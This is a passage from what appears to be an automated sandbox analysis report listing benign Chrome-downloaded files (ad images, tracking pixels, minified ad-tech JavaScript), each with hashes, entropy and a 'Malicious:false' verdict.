                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(){function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a}; .function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var da=ca(this);function k(a,b){if(b)a:{var c=da;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&ba(c,a,{configurable:!0,writable:!0,value:b})}} .function m(a){var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:aa(a)};throw Error(String(a)+" is not an iterable or ArrayLike");}function n(a){for(var b,c=[]
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://cm.g.doubleclick.net/pixel?google_nid=openx&google_hm=Yzc4ZGQ1MDktZTM0YS02ZDFjLTYyYjEtZGM3Yjg1Y2JjYTc4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2530
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.886056025519741
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:6X8W57NjCYBZOK76Llnkaia0vGjieF6CDTDME/ptRYhE8HaHoKhYoPq0miI8Xt7:6X8WV13Alnvia0vEECLza686HoqS0tI+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B93369C65B5B1B56D66F623007CC2B4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:B64ADABA8E87260C6E4E12EC3E072A5611EDF248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F5DA5F41FF8EBC6AA83D71FC11C3153FB7845003658EDE04A976530C0994EB8D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DCA5FDDBE121817AFEB0D1301065AFDC092224194C03437B3FF6A28B32B4376D2E73456273A88414E89C51B4723FD0EF544354EF921A360AC17AA3F74549107A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq.....IDATx^.[{..U..{wm.]w.....J.(4.$..H.$d.b..QIP.."E.H..!.Bb.E/...'E.."BZ*.I.[.Y*..{__.w.sf..{......?vg.......w.R...Ru....D..<J...>J..#_...\.8^/p.q...)5(b...W*...P~Pa.pA..k4!..,T.q...q....g..m.....)2...op.<?W)...c..TDlS......b.m$-...'Y.(..Ts.^X..W.OfU..K.+.....N.C}.9..V.Y\.O...jmW..F.G..[n.=.X.....!./..Jew.zD..Py..=.>e....._..$.G..n.`....[.iu...";...B.....u......i[.@Qq.....O..H5....0!.c...D$...{Tx.\?M......D3..........|.8/@...*..B'x.......h`....v..r.....-|..y<1).L..?.!$H.L)......<.w1.J4].U.r....YA.{..v.#Z..h.4q..$II..r....1 ................#...^@...D....@.....sG....@4k..>G.-.LHeB...[....YT..M...?..6I.L..I..m#............!..Sp..D..'.u..-xv...R.r...4..#x.P..}..PF.kI..9..9..B......_B....Q....c...L"<.7..0...joo.,..&...>xH.k ..GN....;......C..R9.....f..hxN.?..{K.8D..z./...=.......Gw......D]....;y.8....u.K/.....U.)....z..+..P..a.u..ZXILh.*.t...7.D.../..;../...D..>..g`.yl.....!.....4..se2..n...,.z...D.8.K..f].=.../.W.F..si1..!.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (28680)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):28778
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2775443083440825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:768:fyR1+Si04qdWLuefSLE7cwvuyU2oiuS6WxkkwCdIJfL2G:qrBQg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0D07B0C691AD5B9DC4CC4105F284309F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:364B2668205D16A46E51F1494043D9122EE6383E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:994A2E63E024D6892F1381CAD6C3D8F0167DC76024327B7785926BF14B7671E4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3D201887F5DF5D957F3F3A24CF605E77C1F5A45AF8254ACDD6327FBD98F3B73666A03263F494CAFC9DEB0CAEB4CE43D66DF0B80C57C7DEC8646AA66D9340F380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:/*! For license information please see _staticFinProtobuf.4b1559b8e4645fd93a12.mjs.LICENSE.txt */.!function(e){"use strict";var t,n,r,i,o=e.Reader,a=e.util,s=e.roots.default||(e.roots.default={});s.quotefeeder=((r={}).QuoteType=(t={},(n=Object.create(t))[t[0]="NONE"]=0,n[t[5]="ALTSYMBOL"]=5,n[t[7]="HEARTBEAT"]=7,n[t[8]="EQUITY"]=8,n[t[9]="INDEX"]=9,n[t[11]="MUTUALFUND"]=11,n[t[12]="MONEYMARKET"]=12,n[t[13]="OPTION"]=13,n[t[14]="CURRENCY"]=14,n[t[15]="WARRANT"]=15,n[t[17]="BOND"]=17,n[t[18]="FUTURE"]=18,n[t[20]="ETF"]=20,n[t[23]="COMMODITY"]=23,n[t[28]="ECNQUOTE"]=28,n[t[41]="CRYPTOCURRENCY"]=41,n[t[42]="INDICATOR"]=42,n[t[43]="CUL_IDX"]=43,n[t[44]="CUL_SUB_IDX"]=44,n[t[45]="CUL_ASSET"]=45,n[t[1e3]="INDUSTRY"]=1e3,n),r.MarketHours=function(){var e={},t=Object.create(e);return t[e[0]="PRE_MARKET"]=0,t[e[1]="REGULAR_MARKET"]=1,t[e[2]="POST_MARKET"]=2,t[e[3]="EXTENDED_HOURS_MARKET"]=3,t}(),r.OptionType=function(){var e={},t=Object.create(e);return t[e[0]="CALL"]=0,t[e[1]="PUT"]=1,t}(),r.Pr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (32022)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):106349
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.587785562009243
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:AwCpZQzWeMczK6XHkvo3y3myeC88p5B/biKx0lDO6aebm53l:cZQKeM4MsX45h+y53l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9119752D478228B01ACA2A26BB30D7EB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7F2F123F8344A6DE308F1C3A3295F0322099AE04
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:639E5F66988BCA1651DCA1865D016AD75FA733455BA203E08A92AE51ED1E959E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3E9C79B9172103554F22C2B94295264D0F612FBF24A14FFDD98A6C5741B8337DAC85824F872D5E155BCEC2DF35B358C7BBF33E5FB3FF9638738FEE1EDB4CAECB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},v=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2920), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2920
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.278382327824268
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:0GoPdhpMzANg4+rItkVsjxe3iRfLIzzL9qMEqK/VEjbJtbmsrIonbl8Q6LBI0uBP:poPTdfbiVsjgiRfL2f9sqK/VEjiOnF6K
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:653708AD1BBAE1579927B6391B2A28F3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4261E415C23DFD9D925F071737FB0D236F856F4E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:82D2DC44AAE1EDA52ABC17AFD30C6031B7175C13EE6955410164C66AE755ADFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:4092D81BEEAADB7ECA73EE279AF0A5289CAF850253464BAA4F7695C49670C05F7E89630807A2C41D3D9CAD75D95A60719FDB1A16265537153952774F7450873C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://js-sec.indexww.com/um/ixmatch.html
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<!doctype html><head></head><body><script>!function(t){var e={};function r(n){if(e[n])return e[n].exports;var i=e[n]={i:n,l:!1,exports:{}};return t[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=t,r.c=e,r.d=function(t,e,n){r.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:n})},r.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},r.t=function(t,e){if(1&e&&(t=r(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)r.d(n,i,function(e){return t[e]}.bind(null,i));return n},r.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return r.d(e,"a",e),e},r.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},r.p="",r(r.s=0)}([function(t,e){let r=!1;const n={};let i,a,o,c;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1456 x 180, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3553
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.712468132921192
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:9XWFWUUUURxBb4JLiFqffzoDSIXyJRX4X4pAIqD5UA7Tj512g0y7sdPUUUUUUUUn:9m2ILPzt3oJeALHUy72
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:EB8B2C4FFB64120594111BE701937233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C22A52EF2A63E51DD0B6835E454158924241F4B0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AE180701F9E95EAD6150C2B8599C4EAAF6B819AF4045225FD01A6D680793D862
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:B8A80CD9474F939C84ACA661AB31788AD733A238094CDE0AD1ECA177C71940B587BADD142D8876A0EB2DEC7B4620F8FB59018DF8C406BA4D2EE0F5CC7676E6A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s0.2mdn.net/ads/richmedia/studio/23579273/23579273_20211207093431592_2022_Cadillac_SingleFrame_VisID_logo_black_728x90_large.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............Eq......tEXtSoftware.Adobe ImageReadyq.e<....IDATx...[..U...9e. ".!..Di..R......D.r.A..|P........AM|...LA.1 &J.DD..V.h.*..H.r....2s<...v...oN~....=..2....Y33..*......f.&..... #.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......HI......@J.l.....R.`.......................$...... %.6.....).......Hi...b.w~C,.....S1.....?.).....#.6i...A]?..?;......";F.2...hS.5.....53....9...jP....F..m^9l.3...E.....{..G........+s`..i...G..m:cP....6:....K.Y.k-....@...M..qfn..A].)..t...:8.Q.Jp.Wv..&8..a...7.m..X....n...Z..^..........y..?....p].q....#j.yN.&.....6....}>...N../j.)..Qk.~.uL..|>a.4....8....}.%..4l...u}v.,.j..OF..u.<..%.8v.u.....w+..m57Jz[..69......:{<......>.`..i....g.........|.!.......2....?f+..I..S..[..E]4...
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (13714), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13714
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.23465777657958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:3oEREi6qrvGmlR1IaKJoCmXK6Tb8JIFbXv00O8jp4f3tjf+88uLUH:4ER1XDlR1xVNXK6Tb8JknODjm88u4H
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:94D07DAA349C254B35FFCDA6E54CC754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C46D6650E0F01C7F2977182F8FE5D5A07ABA9EE5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0291E42C6C243B4177E0331B6E3692A8E03E29A39852790CE81604A998872C68
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8B3FEB7625D38BD50F22B838A14868D15EEBE1DFE6715A422B777A267585A1BAF9DE5982A29089C6BB7C0FC3DEAE8CE8B57F1BE851F78F1EECC9B625F08917CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-form",[],t):"object"==typeof exports?exports["wafer-form"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-form"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(r){if(n[r])return n[r].exports;var i=n[r]={i:r,l:!1,exports:{}};return e[r].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r=window.webpackJsonpwafer_wafers_wafer_form;window.webpackJsonpwafer_wafers_wafer_form=function(t,n,o){for(var a,s,u=0,l=[];u<t.length;u++)s=t[u],i[s]&&l.push(i[s][0]),i[s]=0;for(a in n)Object.prototype.hasOwnProperty.call(n,a)&&(e[a]=n[a]);for(r&&r(t,n,o);l.length;)l.shift()()};var n={},i={1:0,2:0};return t.e=function(e){function r(){s.onerror=s.onload=null,clearTimeout(u);var t=i[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),i[e]=void 0)}var n=i[e];if(0===n)return new Promise(function(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):3768
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.909438443382918
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:qnvrhn8Deky9O/BC7859s3arCsaEuTt+MrKww53JN:qvqDVaOFA3KC+uLKwMJN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:4D2129EDCAB36EEF56472FC0719F060D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8D4CC3A58F850836073D77E424084930DF190BC0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:2321853E5577C07EAD56589F86DDD16ED5E4B2192A9CEA627F7AE723591EE84D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:5008B2AF8071B6CA23CEC3630E8D98FA79CDA82BCE38B5C35916F3A8BBC84F320ED5E5B55BF68E767EF813D6B04CECFA5B258407EC4F1304385CECD48E4F5F74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq...) =8,=..*...t_...E0E6&A;4J..+/&;!.3ZHC9-?0';;0@3)>2'94*=;/?#.6IBV1';</=3);0(?3)=L?G5,DE8E0';K9@$.67-E:/DA:OL:F.%;UCP6*;LE[7,;6+@3':A5E,$=.&:6,=C<T;.<6-D...+#;.........................B....CPL\..PNIZ...SO^.....+.AQK]........Q.......E/&>...............O.H,$<lhwVP`............e^q........ELHX6-I.......<........J{v.+#:3+F/'A..........@pkz......_Zj..0d\o..UbZm......vq.]Yg... .2..S,#?..8..M...&.9....B.6.....:....9...d_n.K......!.5hdr........ibuWRdjeurn|...".4.R...(.9......ZVd.........|..............................D=Q....................f^r......gas....B.M.}.A.........^.......xt....KGV...............H..........z.2*B.........W.[....r.a.=.........@a\k.....SN_ZTf.h........1......91F..................Q.v..Exr..a.5...7tRNS...............w.d..l...Y...!.6.%....+.......?...I....._.....IDATX..wX.Y.. $4uUD.,.....kr7d"!.&.R.!..@..@.*E@4.DD.h@.,...""RD.c.....X.....KB..qw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (801)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):802
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.390721824599287
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:eIaPb+kNVuqb8mKB6jB18mKBfiHTaKm3Bu:e/P7N4mw6Mmwfi2nxu
